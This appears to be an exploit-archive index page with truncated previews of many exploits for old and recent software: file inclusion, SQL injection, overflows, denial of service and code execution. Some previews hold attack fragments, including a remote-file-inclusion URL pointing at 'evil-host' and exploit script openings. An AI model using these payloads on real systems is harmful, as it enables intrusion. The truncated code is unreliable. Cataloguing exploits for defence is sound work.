SQLiteManager 1.2 - main.php Multiple HTML Injection Vulnerabilities

SQLiteManager 1.2 - main.php Multiple HTML Injection Vulnerabilities source: https://www.securityfocus.com/bid/22731/info SQLiteManager is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input data. Exploiting these issues may allow an...

PHPFootball 1.6 - Remote Database Disclosure

PHPFootball 1.6 - Remote Database Disclosure Title : PHPFootball 1.6 show.php Remote Database Disclosure Vulnerability Author : ajann Contact : : S.Page : http://phpfootball.sourceforge.net $$ : Free Dork : inurl:/phpfootball/ DBREAD---------------------------------------------------------...

Apple Mac OSX 10.4.7 - Mach Exception Handling Local (10.3.x)

Apple Mac OSX 10.4.7 - Mach Exception Handling Local 10.3.x / excploit.c - 28 Nov 2005 - [email protected] Exploitable Mach Exception Handling Affected: Mac OS X 10.4.6 darwin 8.6.0 and older When a process executes a setuid executable, all existing rights to the task port are invalidated,...

Integramod Portal 2.0 rc2 - phpbb_root_path Remote File Inclusion

Integramod Portal 2.0 rc2 - phpbbrootpath Remote File Inclusion matasanos Integramod Portal 2.x File Inclusion Vulnerabilities affected software: Integramod Portal vendor: Integramod . you can donwload it from http://www.integramod.com level: Highly Critical muy critico...

OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflows (PoC)

OpenMPT 1.17.02.43 - Multiple Remote Buffer Overflows PoC / by Luigi Auriemma / include include include include ifdef WIN32 include // htonl else include endif define VER "0.1" define HEAPOVERSZ 512 define ITPHEAPOVERSZ 150000 define ALLOCSAMPLESZ 39 & 7 + 16 define SONGITPROJECT 0x20000 void...

Mambo Component User Home Pages 0.5 - Remote File Inclusion

Mambo Component User Home Pages 0.5 - Remote File Inclusion Kurdish Security Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Rish : High Class : Remote Script : User Home Pges Site : www.ravensportal.co.uk Thanx :...

QBik WinGate WWW Proxy Server 6.1.1.1077 - POST Remote Buffer Overflow

QBik WinGate WWW Proxy Server 6.1.1.1077 - POST Remote Buffer Overflow Proof of concept not for "in the wild" kiddies QBik Wingate version 6.1.1.1077 remote exploit for Win2k SP4 german by kcope in 2006 use IO::Socket; if $ARGV0 eq "" print "param1 = remote host"; exit; win32bind - EXITFUNC=seh...

panic-reloaded - TCP Denial of Service Tool

panic-reloaded - TCP Denial of Service Tool / ----------------------------------------------------------------------------- / \ / / / / / / / / / / / / / / / / / // / / // / / / / // // // / / / / / / // // ,/ ,/ // / Security Community...

EZDatabase 2.1.1 - index.php Cross-Site Scripting

EZDatabase 2.1.1 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/16257/info EZDatabase is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to ha...

AppServ Open Project 2.4.5 - Remote File Inclusion

AppServ Open Project 2.4.5 - Remote File Inclusion source: https://www.securityfocus.com/bid/16166/info AppServ Open Project is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this...

Multiple Vendor BIOS - Keyboard Buffer Password Persistence (2)

Multiple Vendor BIOS - Keyboard Buffer Password Persistence 2 // source: https://www.securityfocus.com/bid/15751/info Multiple vendors fail to clear the BIOS Basic Input-Output System keyboard buffer after reading the preboot authentication password during the system startup process. Depending on...

SoftBiz B2B trading Marketplace Script 1.1 - selloffers.php?cid SQL Injection

SoftBiz B2B trading Marketplace Script 1.1 - selloffers.php?cid SQL Injection source: https://www.securityfocus.com/bid/15652/info Softbiz B2B Trading Marketplace is prone to multiple SQL injection vulnerabilities. These issues are due to a failure in the application to properly sanitize...

Snort 2.4.0 2.4.3 - Back Orifice Pre-Preprocessor Remote (Metasploit)

Snort 2.4.0 2.4.3 - Back Orifice Pre-Preprocessor Remote Metasploit $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...

PBLang 4.65 - Remote Command Execution (2)

PBLang 4.65 - Remote Command Execution 2 php.exe ..\www\r57pblang465.php localhost /pbl/ "pblcookie732128=Pe ng0; PBLsecid=a4c2f845c002ac54f5751440647f3c91;" Peng0 PrSrS $ARGV = $SERVER'argv'; global $ARGV; ifcount$ARGV == 0 echo...

K-COLLECT CSV_DB.CGI 1.0i_DB.CGI 1.0 - Remote Command Execution

K-COLLECT CSVDB.CGI 1.0iDB.CGI 1.0 - Remote Command Execution // source: https://www.securityfocus.com/bid/14059/info CSVDB.CGI/iDB.CGI are affected by a remote command execution vulnerability. Specifically, an attacker can supply arbitrary commands prefixed with the '|' character through the...

PostNuke Phoenix 0.7x - CATID SQL Injection

PostNuke Phoenix 0.7x - CATID SQL Injection source: https://www.securityfocus.com/bid/12683/info PostNuke Phoenix is reported prone to an SQL injection vulnerability. This issue arises due to insufficient sanitization of user-supplied input. It is reported that issue presents itself when maliciou...

Microsoft Internet Explorer - .ANI Downloader (MS05-002)

Microsoft Internet Explorer - .ANI Downloader MS05-002 / Modified by Vertygo aka Ivanm [email protected] all credits goes to houseofdabus Berend-Jan Wever and to milw0rm/ / Added string.h /str0ke / / HOD-ms05002-ani-expl.c: 2005-01-10: PUBLIC v.0.2 Copyright c 2004-2005 houseofdabus. MS05-002...

Webmin 1.5 - Web Brute Force (CGI)

Webmin 1.5 - Web Brute Force CGI !/usr/bin/perl use CGI qw:standard; use IO::Socket; $CGI::HEADERSONCE = 1; $CGI = new CGI; $atak = $CGI-param"atak"; $host = $CGI-param"host"; $wlist = $CGI-param"wlist"; $cmd = $CGI-param"cmd"; print $CGI-header-type='text/html',-charset='windows-1254'; print...

Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing

Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing Advisory Information ------------------------- Software Package : Hosting Controller Vendor Homepage : http://www.hostingcontroller.com Platforms : Windows based servers Vulnerable Versions : All version Tested on: v.6.1 Hotfix 1.4 Vendor...

phpBB 2.0.x - admin_cash.php PHP Remote File Inclusion

phpBB 2.0.x - admincash.php PHP Remote File Inclusion source: https://www.securityfocus.com/bid/11701/info A vulnerability is reported to exist in the phpBB CashMod module that may allow an attacker to include malicious PHP files containing arbitrary code to be executed on a vulnerable system...

AlShare Software NetNote Server 2.2 - Remote Denial of Service

AlShare Software NetNote Server 2.2 - Remote Denial of Service // source: https://www.securityfocus.com/bid/11677/info NetNote server is reported prone to a remote denial of service vulnerability. This issue occurs because the application does not handle exceptional conditions properly. NetNote...

ocPortal 1.0.3 - Remote File Inclusion

ocPortal 1.0.3 - Remote File Inclusion http://localhost/ocp-103/index.php?reqpath=http ://evil-host/ On your evil host you must put scipt funcs.php. Example of funcs.php if your host doesn't support php. Example of funcs.php if your host support php. '; ?...

Microsoft Windows Server 2000 - Utility Manager All-in-One (MS04-019)

Microsoft Windows Server 2000 - Utility Manager All-in-One MS04-019 / COROMPUTER2004 Crpt Utility Manager exploit v2.666 modified by kralor Crpt It gets system language and sets windows names to work on any win2k :P Feel free to add other languages : v2.666: added autonomous allinone remote...

CVS (LinuxFreeBSD) - Remote Entry Line Heap Overflow

CVS LinuxFreeBSD - Remote Entry Line Heap Overflow include include include include include include include include include include include include include include typedef unsigned char uchar; void progressvoid; int brutecvsrootvoid; int bruteusernamevoid; int brutepasswordvoid; void hdlcrashedint...

Linux Kernel 2.2.252.4.242.6.2 - mremap() Validator

Linux Kernel 2.2.252.4.242.6.2 - mremap Validator / Proof-of-concept exploit code for domremap 2 EDB Note: This is NOT to be confused with CVE-2003-0985 // https://www.exploit-db.com/exploits/141/, which would be "domremap 1". EDB Note: This will just "test" the vulnerability. A exploit version c...

DCP-Portal 5.5 - advertiser.php?Password SQL Injection

DCP-Portal 5.5 - advertiser.php?Password SQL Injection source: https://www.securityfocus.com/bid/8739/info Multiple SQL Injection vulnerabilities have been discovered that affect DCP-Portal scripts. These issues are likely due to a lack of sufficient sanitization performed on user supplied URI...

Cisco IOS - cisco-bug-44020.c IPv4 Packet Denial of Service

Cisco IOS - cisco-bug-44020.c IPv4 Packet Denial of Service // / cisco-bug-44020.c - Copyright by Martin Kluge [email protected] / / / / Feel free to modify this code as you like, as long as you include / / the above copyright statement. / / / / Please use this code only to check your OWN cisco...

InstaBoard 1.3 - index.cfm SQL Injection

InstaBoard 1.3 - index.cfm SQL Injection source: https://www.securityfocus.com/bid/7338/info It has been reported that multiple input validation errors exist in the index.cfm file included with InstaBoard. Because of this issue, remote attackers may launch SQL injection attacks through the...

Apache 2.x - Memory Leak

Apache 2.x - Memory Leak / apache-massacre.c Test code for Apache 2.x Memory Leak By Matthew Murphy DISCLAIMER: This exploit tool is provided only to test networks for a known vulnerability. Do not use this tool on systems you do not control, and do not use this tool on networks you do not own...

PHP 4 - PHPInfo() Cross-Site Scripting

PHP 4 - PHPInfo Cross-Site Scripting source: https://www.securityfocus.com/bid/7805/info Scripts that include the PHP phpinfo debugging function may be prone to cross-site scripting attacks. This could permit remote attackers to create a malicious link to a vulnerable PHP script that includes...

Microsoft Foundation Class Library 7.0 - ISAPI Buffer Overflow

Microsoft Foundation Class Library 7.0 - ISAPI Buffer Overflow // source: https://www.securityfocus.com/bid/5188/info The Microsoft Foundation Class Library is a library used to develop applications for Microsoft Windows. Some versions of the MFC include an ISAPI class, which can be used to...

Amtote Homebet - Account Information Brute Force

Amtote Homebet - Account Information Brute Force source: https://www.securityfocus.com/bid/3371/info Homebet is an internet based betting application that is developed by Amtote International. A vulnerability exists in Homebet which could enable a non-registered user to confirm the validity of...

ID Software Quake 3 - SMURF Denial of Service

ID Software Quake 3 - SMURF Denial of Service // source: https://www.securityfocus.com/bid/3060/info Quake 3 network play features contain a remotely exploitable denial of service vulnerability. A hostile client program can be used by to generate a large number of forged client queries on behalf ...

Tarantella Enterprise 3 3.x - TTAWebTop.cgi Arbitrary File Viewing

Tarantella Enterprise 3 3.x - TTAWebTop.cgi Arbitrary File Viewing source: https://www.securityfocus.com/bid/2890/info Tarantella Enterprise 3 is a tool for centralized management of data and applications. It is operated via a web interface. It will run on a number of Unix and Linux distributions...

OReilly Software WebSite Professional 2.3.182.42.4.9 - webfind.exe Remote Buffer Overflow

OReilly Software WebSite Professional 2.3.182.42.4.9 - webfind.exe Remote Buffer Overflow // source: https://www.securityfocus.com/bid/1487/info O'Reilly WebSite Professional is a web server package distributed by O'Reilly & Associates. Certain versions of this web server the entire 2.X version...

Stake AntiSniff 1.0.1Researchers 1.0 - DNS Overflow (3)

Stake AntiSniff 1.0.1Researchers 1.0 - DNS Overflow 3 // source: https://www.securityfocus.com/bid/1207/info Certain versions of @Stake Inc.'s Antisniffer software contain a remotely exploitable buffer overflow. AntiSniff is a program that was released by L0pht Heavy Industries in July of 1999. I...

SCO Unixware 7.1 - varmail Permissions

SCO Unixware 7.1 - varmail Permissions source: https://www.securityfocus.com/bid/849/info Certain versions of SCO's UnixWare only 7.1 was tested ship with the /var/mail/ directory with permission 777-rwxrwxrwx . This in effect allows malicious users to read incoming mail for users who do not yet...

Compaq Client Management Agents 3.704.0 Insight Management Agents 4.21 A4.22 A4.30 A Intelligent Cluster Administrator 1.0 Management Agents for Workstations 4.20 A Server Management Agents 4.23 Survey Utility 2.0 - Web File Access

Compaq Client Management Agents 3.704.0 Insight Management Agents 4.21 A4.22 A4.30 A Intelligent Cluster Administrator 1.0 Management Agents for Workstations 4.20 A Server Management Agents 4.23 Survey Utility 2.0 - Web File Access source: https://www.securityfocus.com/bid/282/info A vulnerabilit...

FreeBSD 2.x HP-UX 91011 Kernel 2.0.3 Windows NT 4.0Server 2003 NetBSD 1 - land.c loopback Denial of Service (2)

FreeBSD 2.x HP-UX 91011 Kernel 2.0.3 Windows NT 4.0Server 2003 NetBSD 1 - land.c loopback Denial of Service 2 source: https://www.securityfocus.com/bid/2666/info A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and po...

Microsoft IIS 2.03.0 - Appended Dot Script Source Disclosure

Microsoft IIS 2.03.0 - Appended Dot Script Source Disclosure source: https://www.securityfocus.com/bid/2074/info Microsoft Internet Information Server IIS is a popular web server, providing support for a variety of scripting languages, including ASP active server pages. IIS 2.0 and 3.0 suffer fro...

Quick N Easy Web Server 3.3.8 - Denial of Service (PoC)

Quick N Easy Web Server 3.3.8 - Denial of Service PoC Title: Quick N Easy Web Server 3.3.8 - Denial of Service PoC Date: 2019-12-25 Author: Cody Winkler Vendor Homepage: https://www.pablosoftwaresolutions.com/ Software Link: https://www.pablosoftwaresolutions.com/html/quickneasywebserver.html...

eLection 2.0 - id SQL Injection

eLection 2.0 - id SQL Injection Title: eLection 2.0 - 'id' SQL Injection Date: 2020-02-21 Exploit Author: J3rryBl4nks Vendor Homepage: https://sourceforge.net/projects/election-by-tripath/ Software Link: https://sourceforge.net/projects/election-by-tripath/files/Version 2.0 Tested on Ubuntu 19/Ka...

AbsoluteTelnet 11.12 - _license name_ Denial of Service (PoC)

AbsoluteTelnet 11.12 - license name Denial of Service PoC Exploit Title: AbsoluteTelnet 11.12 - "license name" Denial of Service PoC Discovery by: chuyreds Discovery Date: 2020-02-05 Vendor Homepage: https://www.celestialsoftware.net/ Software Link :...

AbsoluteTelnet 11.12 - SSH2username Denial of Service (PoC)

AbsoluteTelnet 11.12 - SSH2username Denial of Service PoC Exploit Title: AbsoluteTelnet 11.12 - 'SSH2/username' Denial of Service PoC Discovery by: chuyreds Discovery Date: 2020-02-05 Vendor Homepage: https://www.celestialsoftware.net/ Software Link :...

Sudo 1.8.25p - pwfeedback Buffer Overflow

Sudo 1.8.25p - pwfeedback Buffer Overflow !/bin/bash We will need socat to run this. if ! -f socat ; then wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x8664/socat chmod +x socat fi cat xpl.pl $bufsz = 256; $askpasssz = 32; $signosz = 465; $tgetpassflag =...

Cacti 1.2.8 - Authenticated Remote Code Execution

Cacti 1.2.8 - Authenticated Remote Code Execution !/usr/bin/python3 Exploit Title: Cacti v1.2.8 Remote Code Execution Date: 03/02/2020 Exploit Author: Askar @mohammadaskar2 CVE: CVE-2020-8813 Vendor Homepage: https://cacti.net/ Version: v1.2.8 Tested on: CentOS 7.3 / PHP 7.1.33 import requests...

Octeth Oempro 4.8 - CampaignID SQL Injection

Octeth Oempro 4.8 - CampaignID SQL Injection Exploit Title: Octeth Oempro 4.8 - 'CampaignID' SQL Injection Date: 2020-01-27 Exploit Author: Bruno de Barros Bulle www.xlabs.com.br Vendor Homepage: www2.octeth.com Version: Octeth Oempro v.4.7 and v.4.8 Tested on: Oempro v.4.7 CVE : CVE-2019-19740 A...

Nsauditor 3.1.8.0 - Name Denial of Service (PoC)

Nsauditor 3.1.8.0 - Name Denial of Service PoC Exploit Title: Nsauditor 3.1.8.0 - 'Name' Denial of Service PoC Discovery by: SajjadBnd Date: 2019-11-30 Vendor Homepage: http://www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Tested Version: 3.1.8.0...

Mersive Solstice 2.8.0 - Remote Code Execution

Mersive Solstice 2.8.0 - Remote Code Execution Exploit Title: Mersive Solstice 2.8.0 - Remote Code Execution Google Dork: N/A Date: 2016-12-23 Exploit Author: Alexandre Teyar Vendor Homepage: https://www2.mersive.com/ Firmware Link:...

rConfig 3.9.2 - Remote Code Execution

rConfig 3.9.2 - Remote Code Execution Exploit Title: rConfig 3.9.2 - Remote Code Execution Date: 2019-09-18 Exploit Author: Askar Vendor Homepage: https://rconfig.com/ Software link: https://rconfig.com/download Version: v3.9.2 Tested on: CentOS 7.7 / PHP 7.2.22 CVE : CVE-2019-16662...